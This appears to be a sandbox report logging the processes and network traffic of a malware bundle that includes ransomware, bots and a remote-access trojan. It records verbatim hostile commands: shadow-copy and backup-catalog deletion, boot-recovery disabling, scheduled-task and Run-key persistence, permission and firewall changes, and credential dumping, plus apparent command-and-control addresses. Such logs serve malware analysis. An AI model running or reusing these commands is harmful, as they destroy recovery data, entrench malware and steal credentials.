"C:\Users\Admin\AppData\Local\Temp\is-NJVTG.tmp\ska2pwej.aeh.tmp" /SL5="$4022C,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bot" /sc ONLOGON /tr "'C:\Program Files\Java\jdk-1.8\include\bot.exe'" /rl HIGHEST /f
C:\Users\Admin\Desktop\1.exe
"C:\Users\Admin\Desktop\1.exe"
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
"ska2pwej.aeh.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
"RIP_YOUR_PC_LOL.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\ProgramData\Microsoft OneDrive\setup\System.exe'" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
"bot.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
"4363463463464363463463463.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bot" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\RarSFX0\00000000\bot.exe'" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\is-I5IQQ.tmp\tuc2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I5IQQ.tmp\tuc2.tmp" /SL5="$4031E,4513031,54272,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tuc2.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\PROGRA~3\system.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\DesktopShellAppStateContract\dllhost.exe'" /rl HIGHEST /f
C:\PROGRA~3\system.exe
C:\PROGRA~3\system.exe
C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe
"C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe" -i
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 193
C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe
"C:\Users\Admin\AppData\Local\Send Reports Form\sendreportsform.exe" -s
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\l41MpFgpBE.bat"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 193
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE
C:\Program Files\Java\jdk-1.8\include\bot.exe
"C:\Program Files\Java\jdk-1.8\include\bot.exe"
C:\Windows\system32\wbem\wmic.exe
"C:\l\..\Windows\dslx\dyx\..\..\system32\el\ggpy\..\..\wbem\mwkh\dtstq\..\..\wmic.exe" shadowcopy delete
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___VV5V_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___Q1EGTJTM_.txt
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004C8
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /d /c taskkill /f /im E > NUL & ping -n 1 127.0.0.1 > NUL & del C > NUL && exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im E
C:\Windows\SysWOW64\PING.EXE
ping -n 1 127.0.0.1
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "lldluhdhlxabv396" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "lldluhdhlxabv396" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004C8
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 6708 -ip 6708
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6708 -s 884
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.joinmassive.com | udp |
| US | 8.8.8.8:53 | stats.walliant.com | udp |
| US | 18.172.89.91:443 | api.joinmassive.com | tcp |
| US | 172.67.189.175:443 | stats.walliant.com | tcp |
| SG | 76.73.17.194:9090 | tcp | |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 175.189.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| CN | 121.37.198.25:8287 | 121.37.198.25 | tcp |
| US | 8.8.8.8:53 | 25.198.37.121.in-addr.arpa | udp |
| RU | 91.218.114.4:80 | 91.218.114.4 | tcp |
| US | 172.67.138.35:443 | still.topteamlife.com | tcp |
| RU | 87.236.16.222:443 | tcp | |
| US | 8.8.8.8:53 | 34.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 255.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.178.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.179.98.87.in-addr.arpa | udp |
| RU | 91.218.114.11:80 | 91.218.114.11 | tcp |
| US | 8.8.8.8:53 | 38.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 255.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.179.98.87.in-addr.arpa | udp |
| RU | 91.218.114.25:80 | 91.218.114.25 | tcp |
| US | 8.8.8.8:53 | 47.179.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | DanilWhiteNjrat-57320.portmap.host | udp |
| RU | 91.218.114.25:80 | tcp | |
| DE | 131.188.40.189:443 | tcp | |
| FR | 87.98.178.255:6893 | udp | |
| FR | 87.98.179.0:6893 | udp | |
| FR | 87.98.179.1:6893 | udp | |
| FR | 87.98.179.2:6893 | udp | |
| FR | 87.98.179.3:6893 | udp | |
| FR | 87.98.179.4:6893 | udp | |
| FR | 87.98.179.5:6893 | udp | |
| FR | 87.98.179.6:6893 | udp | |
| FR | 87.98.179.7:6893 | udp | |
| FR | 87.98.179.8:6893 | udp | |
| FR | 87.98.179.9:6893 | udp | |
| FR | 87.98.179.10:6893 | udp | |
| FR | 87.98.179.11:6893 | udp | |
| FR | 87.98.179.12:6893 | udp | |
| FR | 87.98.179.13:6893 | udp | |
| FR | 87.98.179.14:6893 | udp | |
| FR | 87.98.179.15:6893 | udp | |
| FR | 87.98.179.16:6893 | udp | |
| FR | 87.98.179.17:6893 | udp | |
| FR | 87.98.179.18:6893 | udp | |
| FR | 87.98.179.19:6893 | udp | |
| FR | 87.98.179.20:6893 | udp | |
| FR | 87.98.179.21:6893 | udp | |
| FR | 87.98.179.22:6893 | udp | |
| FR | 87.98.179.23:6893 | udp | |
| FR | 87.98.179.24:6893 | udp | |
| FR | 87.98.179.25:6893 | udp | |
| FR | 87.98.179.26:6893 | udp | |
| FR | 87.98.179.27:6893 | udp | |
| FR | 87.98.179.28:6893 | udp | |
| FR | 87.98.179.29:6893 | udp | |
| FR | 87.98.179.30:6893 | udp | |
| FR | 87.98.179.31:6893 | udp | |
| FR | 87.98.179.32:6893 | udp | |
| FR | 87.98.179.33:6893 | udp | |
| FR | 87.98.179.34:6893 | udp | |
| FR | 87.98.179.35:6893 | udp | |
| FR | 87.98.179.36:6893 | udp | |
| FR | 87.98.179.37:6893 | udp | |
| FR | 87.98.179.38:6893 | udp | |
| FR | 87.98.179.39:6893 | udp | |
| FR | 87.98.179.40:6893 | udp | |
| FR | 87.98.179.41:6893 | udp | |
| US | 8.8.8.8:53 | DanilWhiteNjrat-57320.portmap.host | udp |
| FR | 87.98.179.42:6893 | udp | |
| FR | 87.98.179.43:6893 | udp | |
| FR | 87.98.179.44:6893 | udp | |
| FR | 87.98.179.45:6893 | udp | |
| FR | 87.98.179.46:6893 | udp | |
| FR | 87.98.179.47:6893 | udp | |
| FR | 87.98.179.48:6893 | udp | |
| FR | 87.98.179.49:6893 | udp | |
| FR | 87.98.179.50:6893 | udp | |
| FR | 87.98.179.51:6893 | udp | |
| FR | 87.98.179.52:6893 | udp | |
| FR | 87.98.179.53:6893 | udp | |
| FR | 87.98.179.54:6893 | udp | |
| FR | 87.98.179.55:6893 | udp | |
| FR | 87.98.179.56:6893 | udp | |
| FR | 87.98.179.57:6893 | udp | |
| FR | 87.98.179.58:6893 | udp | |
| FR | 87.98.179.59:6893 | udp | |
| FR | 87.98.179.60:6893 | udp | |
| FR | 87.98.179.61:6893 | udp | |
| FR | 87.98.179.62:6893 | udp | |
| FR | 87.98.179.63:6893 | udp | |
| FR | 87.98.179.64:6893 | udp | |
| FR | 87.98.179.65:6893 | udp | |
| FR | 87.98.179.66:6893 | udp | |
| FR | 87.98.179.67:6893 | udp | |
| FR | 87.98.179.68:6893 | udp | |
| FR | 87.98.179.69:6893 | udp | |
| FR | 87.98.179.70:6893 | udp | |
| FR | 87.98.179.71:6893 | udp | |
| FR | 87.98.179.72:6893 | udp | |
| FR | 87.98.179.73:6893 | udp | |
| FR | 87.98.179.74:6893 | udp | |
| FR | 87.98.179.75:6893 | udp | |
| FR | 87.98.179.76:6893 | udp | |
| FR | 87.98.179.77:6893 | udp | |
| FR | 87.98.179.78:6893 | udp | |
| FR | 87.98.179.79:6893 | udp | |
| FR | 87.98.179.80:6893 | udp | |
| FR | 87.98.179.81:6893 | udp | |
| FR | 87.98.179.82:6893 | udp | |
| FR | 87.98.179.83:6893 | udp | |
| FR | 87.98.179.84:6893 | udp | |
| FR | 87.98.179.85:6893 | udp | |
| FR | 87.98.179.86:6893 | udp | |
| FR | 87.98.179.87:6893 | udp | |
| FR | 87.98.179.88:6893 | udp | |
| FR | 87.98.179.89:6893 | udp | |
| FR | 87.98.179.90:6893 | udp | |
| FR | 87.98.179.91:6893 | udp | |
| FR | 87.98.179.92:6893 | udp | |
| FR | 87.98.179.93:6893 | udp | |
| FR | 87.98.179.94:6893 | udp | |
| FR | 87.98.179.95:6893 | udp | |
| FR | 87.98.179.96:6893 | udp | |
| FR | 87.98.179.97:6893 | udp | |
| FR | 87.98.179.98:6893 | udp | |
| FR | 87.98.179.99:6893 | udp | |
| FR | 87.98.179.100:6893 | udp | |
| FR | 87.98.179.101:6893 | udp | |
| FR | 87.98.179.102:6893 | udp | |
| FR | 87.98.179.103:6893 | udp | |
| FR | 87.98.179.104:6893 | udp | |
| FR | 87.98.179.105:6893 | udp | |
| FR | 87.98.179.106:6893 | udp | |
| FR | 87.98.179.107:6893 | udp | |
| FR | 87.98.179.108:6893 | udp | |
| FR | 87.98.179.109:6893 | udp | |
| FR | 87.98.179.110:6893 | udp | |
| FR | 87.98.179.111:6893 | udp | |
| FR | 87.98.179.112:6893 | udp | |
| FR | 87.98.179.113:6893 | udp | |
| FR | 87.98.179.114:6893 | udp | |
| FR | 87.98.179.115:6893 | udp | |
| FR | 87.98.179.116:6893 | udp | |
| FR | 87.98.179.117:6893 | udp | |
| FR | 87.98.179.118:6893 | udp | |
| FR | 87.98.179.119:6893 | udp | |
| FR | 87.98.179.120:6893 | udp | |
| FR | 87.98.179.121:6893 | udp | |
| FR | 87.98.179.122:6893 | udp | |
| FR | 87.98.179.123:6893 | udp | |
| FR | 87.98.179.124:6893 | udp | |
| FR | 87.98.179.125:6893 | udp | |
| FR | 87.98.179.126:6893 | udp | |
| FR | 87.98.179.127:6893 | udp | |
| FR | 87.98.179.128:6893 | udp | |
| FR | 87.98.179.129:6893 | udp | |
| FR | 87.98.179.130:6893 | udp | |
| FR | 87.98.179.131:6893 | udp | |
| FR | 87.98.179.132:6893 | udp | |
| FR | 87.98.179.133:6893 | udp | |
| FR | 87.98.179.134:6893 | udp | |
| FR | 87.98.179.135:6893 | udp | |
| FR | 87.98.179.136:6893 | udp | |
| FR | 87.98.179.137:6893 | udp | |
| FR | 87.98.179.138:6893 | udp | |
| FR | 87.98.179.139:6893 | udp | |
| FR | 87.98.179.140:6893 | udp | |
| FR | 87.98.179.141:6893 | udp | |
| FR | 87.98.179.142:6893 | udp | |
| FR | 87.98.179.143:6893 | udp | |
| FR | 87.98.179.144:6893 | udp | |
| FR | 87.98.179.145:6893 | udp | |
| FR | 87.98.179.146:6893 | udp | |
| FR | 87.98.179.147:6893 | udp | |
| FR | 87.98.179.148:6893 | udp | |
| FR | 87.98.179.149:6893 | udp | |
| FR | 87.98.179.150:6893 | udp | |
| FR | 87.98.179.151:6893 | udp | |
| FR | 87.98.179.152:6893 | udp | |
| FR | 87.98.179.153:6893 | udp | |
| FR | 87.98.179.154:6893 | udp | |
| FR | 87.98.179.155:6893 | udp | |
| FR | 87.98.179.156:6893 | udp | |
| FR | 87.98.179.157:6893 | udp | |
| FR | 87.98.179.158:6893 | udp | |
| FR | 87.98.179.159:6893 | udp | |
| FR | 87.98.179.160:6893 | udp | |
| FR | 87.98.179.161:6893 | udp | |
| FR | 87.98.179.162:6893 | udp | |
| FR | 87.98.179.163:6893 | udp | |
| FR | 87.98.179.164:6893 | udp | |
| FR | 87.98.179.165:6893 | udp | |
| FR | 87.98.179.166:6893 | udp | |
| FR | 87.98.179.167:6893 | udp | |
| FR | 87.98.179.168:6893 | udp | |
| FR | 87.98.179.169:6893 | udp | |
| FR | 87.98.179.170:6893 | udp | |
| FR | 87.98.179.171:6893 | udp | |
| FR | 87.98.179.172:6893 | udp | |
| FR | 87.98.179.173:6893 | udp | |
| FR | 87.98.179.174:6893 | udp | |
| FR | 87.98.179.175:6893 | udp | |
| FR | 87.98.179.176:6893 | udp | |
| FR | 87.98.179.177:6893 | udp | |
| FR | 87.98.179.178:6893 | udp | |
| FR | 87.98.179.179:6893 | udp | |
| FR | 87.98.179.180:6893 | udp | |
| FR | 87.98.179.181:6893 | udp | |
| FR | 87.98.179.182:6893 | udp | |
| FR | 87.98.179.183:6893 | udp | |
| FR | 87.98.179.184:6893 | udp | |
| FR | 87.98.179.185:6893 | udp | |
| FR | 87.98.179.186:6893 | udp | |
| FR | 87.98.179.187:6893 | udp | |
| FR | 87.98.179.188:6893 | udp | |
| FR | 87.98.179.189:6893 | udp | |
| FR | 87.98.179.190:6893 | udp | |
| FR | 87.98.179.191:6893 | udp | |
| FR | 87.98.179.192:6893 | udp | |
| FR | 87.98.179.193:6893 | udp | |
| FR | 87.98.179.194:6893 | udp | |
| FR | 87.98.179.195:6893 | udp | |
| FR | 87.98.179.196:6893 | udp | |
| FR | 87.98.179.197:6893 | udp | |
| FR | 87.98.179.198:6893 | udp | |
| FR | 87.98.179.199:6893 | udp | |
